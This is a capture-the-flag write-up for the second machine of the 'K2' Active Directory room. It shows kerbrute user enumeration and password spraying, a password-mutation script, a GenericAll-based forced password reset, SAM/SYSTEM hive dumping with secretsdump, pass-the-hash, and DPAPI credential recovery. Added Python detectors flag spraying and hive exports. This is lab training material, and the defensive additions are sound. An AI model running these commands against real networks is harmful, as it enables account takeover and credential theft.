Middle Camp

K2 - Are you able to make your way through the mountain? - by hadrian3689


Recon

We stop the first machine and start the second. Our enumeration process starts all over again. We run another Nmap scan and find several Windows-related ports. This time we don't have a website; this seems to be a pure AD machine.

The ports include SMB, RDP, LDAP and Kerberos. After a default service and script scan, we can determine the name of the machine, K2SERVER. We add K2SERVER.K2.THM to our /etc/hosts file.

As already mentioned on the main page, this room is effectively a small network: the machines are related to each other, and we need to pay attention to the note in the room description.

Use all of the information gathered from your previous findings in order to keep making your way to the top.

Foothold

A good resource to follow a methodology on Active Directory enumeration is the orange-cyberdefense mindmap: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg

So, what information do we have? We know the first and last names of at least two users. We can create a wordlist of possible usernames and use it to enumerate valid users with kerbrute.

After running kerbrute with the created wordlist, we are able to spot two valid usernames.

In this writeup, I switch between the different tools because I'm not that experienced with this topic yet, and depending on the version or fork of a tool, the syntax may differ.

./kerbrute_linux_amd64 userenum users.txt --domain k2.thm --dc <IP>

As well as users, we also found a lot of passwords. We now spray these against the target with the two users we found and realize that the password we found in /home/rose/bash_history applies to r.bud.

kerbrute -users users.txt -passwords passwords.txt -domain k2.thm

Using evil-winrm, we can now log in to the machine with the username and password combination we determined. We have a foothold but do not find a flag; instead we find two notes.

With our foothold, we can already answer the second question.
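As an added defensive counterpart (not part of the original writeup), the following Python sketch shows how the kerbrute user enumeration and password spray above look in a domain controller's Security log: enumeration produces 4768 events with status 0x6 for non-existent names, and spraying produces 4771 events with status 0x18 across many accounts from one client address. The events and thresholds are constructed.

```python
from collections import defaultdict

# Constructed sample events (not from the room), shaped like the fields of
# Windows Security events 4768 (TGT requested) and 4771 (pre-auth failed).
# Status 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN (the user does not exist)
# Status 0x18 = KDC_ERR_PREAUTH_FAILED     (wrong password for a real user)
SAMPLE_EVENTS = [
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "r.bud",    "Status": "0x0"},
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "rbud",     "Status": "0x6"},
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "rose.bud", "Status": "0x6"},
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "bud.rose", "Status": "0x6"},
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "jsmith",   "Status": "0x6"},
    {"EventID": 4768, "IpAddress": "10.10.14.5", "TargetUserName": "smith.j",  "Status": "0x6"},
    {"EventID": 4771, "IpAddress": "10.10.14.5", "TargetUserName": "r.bud",    "Status": "0x18"},
    {"EventID": 4771, "IpAddress": "10.10.14.5", "TargetUserName": "j.bold",   "Status": "0x18"},
    {"EventID": 4771, "IpAddress": "10.10.14.5", "TargetUserName": "j.smith",  "Status": "0x18"},
    {"EventID": 4771, "IpAddress": "10.10.14.5", "TargetUserName": "r.bud",    "Status": "0x18"},
    # A normal user mistyping a password once must not trigger anything.
    {"EventID": 4771, "IpAddress": "10.10.20.7", "TargetUserName": "j.smith",  "Status": "0x18"},
]

def detect_kerberos_abuse(events, enum_threshold=5, spray_threshold=3):
    """Return {client_ip: [findings]} for addresses whose Kerberos failures
    look like username enumeration or password spraying."""
    unknown_names = defaultdict(set)   # ip -> distinct non-existent principals
    preauth_fail = defaultdict(set)    # ip -> distinct real accounts with a bad password
    for ev in events:
        if ev["EventID"] == 4768 and ev["Status"].lower() == "0x6":
            unknown_names[ev["IpAddress"]].add(ev["TargetUserName"].lower())
        elif ev["EventID"] == 4771 and ev["Status"].lower() == "0x18":
            preauth_fail[ev["IpAddress"]].add(ev["TargetUserName"].lower())
    findings = defaultdict(list)
    for ip, names in unknown_names.items():
        if len(names) >= enum_threshold:
            findings[ip].append(f"user enumeration: {len(names)} unknown principals")
    for ip, accounts in preauth_fail.items():
        if len(accounts) >= spray_threshold:
            findings[ip].append(f"password spray: {len(accounts)} distinct accounts failed pre-auth")
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in detect_kerberos_abuse(SAMPLE_EVENTS).items():
        print(ip, "->", "; ".join(hits))
```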

Lateral Movement I

In the notes, we find a password policy and the previously used password of j.smith. Furthermore, we learn that the password for j.smith had to be changed. Since the user was unable to remember a new password, the old one was simply adapted to match the policy: as the original only contained letters, a number and a special character had to be added.

We write a script that prepends and appends different permutations of numbers and special characters to create a wordlist; alternatively, John the Ripper's mangling rules could be used on a password list.

gen_pass.py
import itertools
import string

# Base password, replace it
base_password = "REDACTED" 

# Special characters and numbers
special_chars = string.punctuation  # Contains special characters like !, @, #, $, etc.
numbers = "0123456789"  # Numbers from 0-9

# Generate all combinations of one special character and one number
combinations = list(itertools.product(special_chars, numbers))

# Generate all password combinations with prepending and appending
passwords = []

# Prepending the combination
for special_char, number in combinations:
    passwords.append(f"{special_char}{number}{base_password}")  # Prepend both
    passwords.append(f"{number}{special_char}{base_password}")  # Prepend number first

# Appending the combination
for special_char, number in combinations:
    passwords.append(f"{base_password}{special_char}{number}")  # Append both
    passwords.append(f"{base_password}{number}{special_char}")  # Append number first

# Prepend one and append the other
for special_char, number in combinations:
    passwords.append(f"{special_char}{base_password}{number}")  # Prepend special, append number
    passwords.append(f"{number}{base_password}{special_char}")  # Prepend number, append special

# Print the generated passwords
for password in passwords:
    print(password)

# Optionally, write the passwords to a file
with open("generated_passwords.txt", "w") as f:
    for password in passwords:
        f.write(password + "\n")

print(f"Generated {len(passwords)} password combinations.")

We generate the wordlist and use it with kerbrute for the user j.bold.

python gen_pass.py 

And we have the password for j.bold. Unfortunately, we cannot access the system as j.smith using evil-winrm. As you can see from the note, RDP is also blocked for this user.
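Added example, not from the writeup: the weakness exploited above is that the new password is the old one with a digit and a special character bolted on. A password-change filter that normalises away leading and trailing digits and punctuation before comparing the old and new value rejects exactly that class of change. All password values here are constructed.

```python
import string

# Characters users typically bolt on to an old password to satisfy a
# "must contain a digit and a special character" rule.
PADDING = string.digits + string.punctuation

def core_of(password):
    """Strip leading and trailing digits/punctuation and lower-case the rest,
    so 'Basecamp', '1!Basecamp' and 'Basecamp1!' all normalise to 'basecamp'."""
    return password.strip(PADDING).lower()

def is_trivial_variant(old_password, new_password):
    """True if the new password is the old one with padding added, removed or
    moved from one end to the other, or with only its letter case changed."""
    old_core = core_of(old_password)
    return bool(old_core) and old_core == core_of(new_password)

def check_password_change(old_password, new_password, min_length=10):
    """Apply a complexity policy plus the reuse check.
    Returns a list of violations; an empty list means the change is accepted."""
    problems = []
    if len(new_password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if not any(c.isdigit() for c in new_password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in new_password):
        problems.append("no special character")
    if is_trivial_variant(old_password, new_password):
        problems.append("trivial variant of the previous password")
    return problems

if __name__ == "__main__":
    # Constructed values: an old letters-only password and three candidate replacements.
    for candidate in ("Basecamp1!", "!1basecamp", "Glacier-Route7"):
        print(candidate, "->", check_password_change("Basecamp", candidate) or "accepted")
```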

Lateral Movement II

Now we use bloodhound-python. BloodHound-python is a tool used to gather Active Directory data, focusing on relationships and attack paths between users, groups, and computers. It collects information such as group memberships and user privileges, which can be visualized to help identify potential privilege escalation opportunities.

Since the tool can run into name-resolution problems and then does not work properly, we use dnschef. DNSChef is a DNS proxy tool used for DNS spoofing, allowing users to intercept and modify DNS requests. It can be used in penetration testing to redirect traffic or simulate malicious DNS responses for specific domains.

After setting up DNSChef, we use the following call to bloodhound-python with the credentials from r.bud to gather Active Directory data to find an exploit path.

bloodhound-python -d k2.thm -c All -u 'r.bud' -p 'REDACTED' -dc k2.thm -ns 127.0.0.1

Next, we start BloodHound to review the collected files.

We drop in the files we have extracted.

And we find an interesting relation: the user j.bold is a member of IT STAFF 1 and has GenericAll permissions on j.smith.

By right-clicking on the GenericAll edge, we can view in the Linux abuse tab how to make use of it. In short, we can force a password change with an RPC call.

We copy the command suggested by BloodHound.

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

And adapt it to set a new password for j.smith using the credentials of j.bold:

net rpc password "j.smith" "newP@ssword2022" -U "k2.thm"/"j.bold"%"REDACTED" -S "k2.thm"

After changing the password, we are able to log in as j.smith with the newly set password using evil-winrm. On the user's Desktop we find the user flag.

Privilege Escalation

The privilege escalation vector could already be found using BloodHound and the data set we retrieved, but it can also be found locally.

With access as j.smith, we query the privileges we now have with whoami /priv. That user has the SeBackupPrivilege.

This allows access to the SAM and SYSTEM hives, which hold valuable hashes.

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

With the following commands we save those hives and use evil-winrm to download them.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> download c:\Windows\Tasks\SAM
                                        
Info: Downloading c:\Windows\Tasks\SAM to SAM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\j.smith\Desktop> download c:\Windows\Tasks\SYSTEM
                                        
Info: Downloading c:\Windows\Tasks\SYSTEM to SYSTEM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\j.smith\Desktop> 

Next, we use impacket-secretsdump to dump the hashes. We get the local administrator hash and can use the second half (the NT hash) to log in using evil-winrm. With that output we are able to answer the fourth question of task 2.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Via Pass-the-Hash we log in as administrator and are able to retrieve the final flag.
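Added example from the defender's side (not the writeup's own code): exporting the SAM and SYSTEM hives with reg save as shown above is visible in process-creation telemetry (Security 4688 or Sysmon event 1) as reg.exe invoked with save or export against HKLM\SAM, SYSTEM or SECURITY, and it stands out most when the account is not a host administrator. The process records below are constructed.

```python
import re

# Constructed process-creation records (not from the room), shaped like the
# SubjectUserName / CommandLine fields of Security event 4688 or Sysmon event 1.
SAMPLE_PROCESSES = [
    {"SubjectUserName": "j.smith", "CommandLine": r"reg save hklm\sam c:\Windows\Tasks\SAM"},
    {"SubjectUserName": "j.smith", "CommandLine": r"reg  save  HKLM\System c:\Windows\Tasks\SYSTEM"},
    {"SubjectUserName": "svc_backup",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save HKLM\SOFTWARE C:\backup\software.hiv'},
    {"SubjectUserName": "j.smith", "CommandLine": r"reg query hklm\system\currentcontrolset\services"},
    {"SubjectUserName": "j.smith", "CommandLine": r"whoami /priv"},
]

# reg.exe (bare or with a quoted full path) running "save" or "export" on one of
# the hives that yield credential material: SAM (local hashes), SYSTEM (boot key
# that decrypts SAM) and SECURITY (LSA secrets, cached domain logons).
HIVE_DUMP_RE = re.compile(
    r'(?:^|[\\\s"])reg(?:\.exe)?"?\s+(save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(sam|system|security)"?(?:\s|$)',
    re.IGNORECASE,
)

def find_hive_dumps(processes):
    """Return (user, verb, hive) for every process whose command line exports a
    credential hive; other reg.exe usage (query, other hives) is left alone."""
    hits = []
    for proc in processes:
        match = HIVE_DUMP_RE.search(proc["CommandLine"])
        if match:
            hits.append((proc["SubjectUserName"], match.group(1).lower(), match.group(2).lower()))
    return hits

def non_admin_hive_dumps(processes, admins=frozenset({"administrator"})):
    """The high-signal subset: hive exports by accounts that are not expected to
    administer the host, which is what a SeBackupPrivilege holder produces."""
    return [hit for hit in find_hive_dumps(processes) if hit[0].lower() not in admins]

if __name__ == "__main__":
    for user, verb, hive in non_admin_hive_dumps(SAMPLE_PROCESSES):
        print(f"ALERT: {user} ran reg {verb} on HKLM\\{hive}")
```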

Furthermore, we are able to retrieve the cleartext password of the administrator using netexec with the --dpapi switch, which could be interesting for later use. See Hiker's writeup:

DPAPI (Data Protection API) is a Windows feature used to securely encrypt sensitive data like passwords, certificates, and encryption keys. An exploit targeting DPAPI involves retrieving encrypted data from a compromised system and then decrypting it using the system's master keys, which can often be extracted if administrative or elevated privileges are obtained.

nxc smb k2.thm -u administrator -H 'REDACTED' --dpapi
